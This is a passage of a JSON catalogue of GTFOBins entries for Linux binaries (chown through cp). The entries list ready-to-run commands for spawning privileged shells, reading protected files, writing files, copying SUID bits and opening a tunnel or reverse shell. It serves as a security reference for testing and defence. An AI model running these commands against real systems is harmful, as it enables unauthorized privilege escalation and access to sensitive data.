installation","aliases":[]},{"id":"gtfo:chown:privilege-escalation:0:suid","toolId":"gtfo:chown","toolName":"chown","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"chown $(id -un):$(id -gn) /path/to/input-file","description":"This can be run with elevated privileges to change ownership and then read, write, or execute a file.","mitre":["T1548"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/chown/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:chroot:shell:0:sudo","toolId":"gtfo:chroot","toolName":"chroot","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"chroot /","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/chroot/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:chroot:shell:0:suid","toolId":"gtfo:chroot","toolName":"chroot","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"chroot / /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/chroot/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:chrt:shell:0:sudo","toolId":"gtfo:chrt","toolName":"chrt","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"chrt 1 /bin/sh","description":"Any number between 1 and 99 will do.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/chrt/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:chrt:shell:0:suid","toolId":"gtfo:chrt","toolName":"chrt","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"chrt 1 /bin/sh -p","description":"Any number between 1 and 99 will do.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/chrt/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:chrt:shell:0:unprivileged","toolId":"gtfo:chrt","toolName":"chrt","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"chrt 1 /bin/sh","description":"Any number between 1 and 99 will do.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/chrt/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:clamscan:file-read:0:sudo","toolId":"gtfo:clamscan","toolName":"clamscan","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"touch x.yara\nclamscan --no-summary -d x.yara -f /path/to/input-file 2>&1 | sed -nE 's/^(.*): No such file or directory$/\\1/p'","description":"Each line of the file is interpreted as a path and the content is leaked via error messages. The output can optionally be cleaned using `sed`.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/clamscan/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:clamscan:file-read:0:suid","toolId":"gtfo:clamscan","toolName":"clamscan","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"touch x.yara\nclamscan --no-summary -d x.yara -f /path/to/input-file 2>&1 | sed -nE 's/^(.*): No such file or directory$/\\1/p'","description":"Each line of the file is interpreted as a path and the content is leaked via error messages. The output can optionally be cleaned using `sed`.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/clamscan/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:clamscan:file-read:0:unprivileged","toolId":"gtfo:clamscan","toolName":"clamscan","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"touch x.yara\nclamscan --no-summary -d x.yara -f /path/to/input-file 2>&1 | sed -nE 's/^(.*): No such file or directory$/\\1/p'","description":"Each line of the file is interpreted as a path and the content is leaked via error messages. The output can optionally be cleaned using `sed`.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/clamscan/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:clisp:shell:0:sudo","toolId":"gtfo:clisp","toolName":"clisp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"clisp -x '(ext:run-shell-command \"/bin/sh\")(ext:exit)'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/clisp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:clisp:shell:0:suid","toolId":"gtfo:clisp","toolName":"clisp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"clisp -x '(ext:run-shell-command \"/bin/sh\")(ext:exit)'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/clisp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:clisp:shell:0:unprivileged","toolId":"gtfo:clisp","toolName":"clisp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"clisp -x '(ext:run-shell-command \"/bin/sh\")(ext:exit)'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/clisp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cmake:file-read:0:sudo","toolId":"gtfo:cmake","toolName":"cmake","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"cmake -E cat /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cmake/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cmake:file-read:0:unprivileged","toolId":"gtfo:cmake","toolName":"cmake","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"cmake -E cat /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cmake/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cmake:shell:0:sudo","toolId":"gtfo:cmake","toolName":"cmake","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'execute_process(COMMAND /bin/sh)' >/path/to/CMakeLists.txt\ncmake /path/to/","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cmake/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cmake:shell:0:unprivileged","toolId":"gtfo:cmake","toolName":"cmake","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo 'execute_process(COMMAND /bin/sh)' >/path/to/CMakeLists.txt\ncmake /path/to/","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cmake/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cmp:file-read:0:sudo","toolId":"gtfo:cmp","toolName":"cmp","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"cmp /path/to/input-file /dev/zero -b -l","description":"Dump the bytes of the input file that are different from the NUL byte in a tabular format.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cmp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cmp:file-read:0:suid","toolId":"gtfo:cmp","toolName":"cmp","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"cmp /path/to/input-file /dev/zero -b -l","description":"Dump the bytes of the input file that are different from the NUL byte in a tabular format.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cmp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cmp:file-read:0:unprivileged","toolId":"gtfo:cmp","toolName":"cmp","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"cmp /path/to/input-file /dev/zero -b -l","description":"Dump the bytes of the input file that are different from the NUL byte in a tabular format.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cmp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cobc:shell:0:sudo","toolId":"gtfo:cobc","toolName":"cobc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'CALL \"SYSTEM\" USING \"/bin/sh\".' >/path/to/temp-file\ncobc -xFj --frelax-syntax-checks /path/to/temp-file","description":"The `/path/to/temp-file` sill be overwritten after the execution.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cobc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cobc:shell:0:suid","toolId":"gtfo:cobc","toolName":"cobc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'CALL \"SYSTEM\" USING \"/bin/sh\".' >/path/to/temp-file\ncobc -xFj --frelax-syntax-checks /path/to/temp-file","description":"The `/path/to/temp-file` sill be overwritten after the execution.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cobc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cobc:shell:0:unprivileged","toolId":"gtfo:cobc","toolName":"cobc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo 'CALL \"SYSTEM\" USING \"/bin/sh\".' >/path/to/temp-file\ncobc -xFj --frelax-syntax-checks /path/to/temp-file","description":"The `/path/to/temp-file` sill be overwritten after the execution.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cobc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:code:download:0:sudo","toolId":"gtfo:code","toolName":"code","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"code tunnel --name xxxxxx","description":"This requires a valid GitHub account.\n\nRun the command locally, then on the attacker box navigate to <https://github.com/login/device>, using the provided code to authorize the tunnel.","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/code/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:code:download:0:unprivileged","toolId":"gtfo:code","toolName":"code","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"code tunnel --name xxxxxx","description":"This requires a valid GitHub account.\n\nRun the command locally, then on the attacker box navigate to <https://github.com/login/device>, using the provided code to authorize the tunnel.","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/code/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:code:reverse-shell:0:sudo","toolId":"gtfo:code","toolName":"code","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"code tunnel --name xxxxxx","description":"This requires a valid GitHub account.\n\nRun the command locally, then on the attacker box navigate to <https://github.com/login/device>, using the provided code to authorize the tunnel.","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/code/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:code:reverse-shell:0:unprivileged","toolId":"gtfo:code","toolName":"code","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"code tunnel --name xxxxxx","description":"This requires a valid GitHub account.\n\nRun the command locally, then on the attacker box navigate to <https://github.com/login/device>, using the provided code to authorize the tunnel.","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/code/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:code:upload:0:sudo","toolId":"gtfo:code","toolName":"code","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"code tunnel --name xxxxxx","description":"This requires a valid GitHub account.\n\nRun the command locally, then on the attacker box navigate to <https://github.com/login/device>, using the provided code to authorize the tunnel.","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/code/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:code:upload:0:unprivileged","toolId":"gtfo:code","toolName":"code","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"code tunnel --name xxxxxx","description":"This requires a valid GitHub account.\n\nRun the command locally, then on the attacker box navigate to <https://github.com/login/device>, using the provided code to authorize the tunnel.","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/code/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:codex:shell:0:sudo","toolId":"gtfo:codex","toolName":"codex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"codex sandbox linux /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/codex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:codex:shell:0:unprivileged","toolId":"gtfo:codex","toolName":"codex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"codex sandbox linux /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/codex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:column:file-read:0:sudo","toolId":"gtfo:column","toolName":"column","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"column /path/to/input-file","description":"This program expects textual data.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/column/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:column:file-read:0:suid","toolId":"gtfo:column","toolName":"column","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"column /path/to/input-file","description":"This program expects textual data.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/column/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:column:file-read:0:unprivileged","toolId":"gtfo:column","toolName":"column","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"column /path/to/input-file","description":"This program expects textual data.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/column/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:comm:file-read:0:sudo","toolId":"gtfo:comm","toolName":"comm","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"comm /path/to/input-file /dev/null","description":"A newline is appended to the file.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/comm/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:comm:file-read:0:suid","toolId":"gtfo:comm","toolName":"comm","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"comm /path/to/input-file /dev/null","description":"A newline is appended to the file.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/comm/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:comm:file-read:0:unprivileged","toolId":"gtfo:comm","toolName":"comm","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"comm /path/to/input-file /dev/null","description":"A newline is appended to the file.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/comm/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:composer:shell:0:sudo","toolId":"gtfo:composer","toolName":"composer","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '{\"scripts\":{\"x\":\"/bin/sh\"}}' >composer.json\ncomposer run-script x","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/composer/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:composer:shell:0:unprivileged","toolId":"gtfo:composer","toolName":"composer","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo '{\"scripts\":{\"x\":\"/bin/sh\"}}' >composer.json\ncomposer run-script x","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/composer/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cowsay:inherit:0:sudo","toolId":"gtfo:cowsay","toolName":"cowsay","name":"inherit ← perl","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:perl"],"command":"cowsay -f /path/to/script.pl x","mitre":["T1105","T1005","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cowsay/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cowsay:inherit:0:unprivileged","toolId":"gtfo:cowsay","toolName":"cowsay","name":"inherit ← perl","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:perl"],"command":"cowsay -f /path/to/script.pl x","mitre":["T1105","T1005","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cowsay/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cowthink:inherit:0:sudo","toolId":"gtfo:cowthink","toolName":"cowthink","name":"inherit ← perl","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:perl"],"command":"cowthink -f /path/to/script.pl x","mitre":["T1105","T1005","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cowthink/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cowthink:inherit:0:unprivileged","toolId":"gtfo:cowthink","toolName":"cowthink","name":"inherit ← perl","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:perl"],"command":"cowthink -f /path/to/script.pl x","mitre":["T1105","T1005","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cowthink/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cp:file-read:0:sudo","toolId":"gtfo:cp","toolName":"cp","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"cp /path/to/input-file /dev/stdout","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cp:file-read:0:suid","toolId":"gtfo:cp","toolName":"cp","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"cp /path/to/input-file /dev/stdout","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cp:file-read:0:unprivileged","toolId":"gtfo:cp","toolName":"cp","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"cp /path/to/input-file /dev/stdout","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cp:file-write:0:sudo","toolId":"gtfo:cp","toolName":"cp","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | cp /dev/stdin /path/to/output-file","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cp:file-write:0:suid","toolId":"gtfo:cp","toolName":"cp","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | cp /dev/stdin /path/to/output-file","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cp:file-write:0:unprivileged","toolId":"gtfo:cp","toolName":"cp","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA | cp /dev/stdin /path/to/output-file","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cp:privilege-escalation:0:sudo","toolId":"gtfo:cp","toolName":"cp","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"cp /path/to/input-file /path/to/output-file","description":"This can be used to copy and then read or write files from a restricted file systems or with elevated privileges. (The GNU version of `cp` has the `--parents` option that can be used to also create the directory hierarchy specified in the source path, to the destination folder.)","mitre":["T1548"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cp:privilege-escalation:0:suid","toolId":"gtfo:cp","toolName":"cp","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"cp /path/to/input-file /path/to/output-file","description":"This can be used to copy and then read or write files from a restricted file systems or with elevated privileges. (The GNU version of `cp` has the `--parents` option that can be used to also create the directory hierarchy specified in the source path, to the destination folder.)","mitre":["T1548"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cp:privilege-escalation:1:sudo","toolId":"gtfo:cp","toolName":"cp","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"cp --attributes-only --preserve=all /path/to/input-file /path/to/output-file","description":"This can copy SUID permissions from any SUID binary (e.g., `/path/to/input-file`) to another.","mitre":["T1548"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check 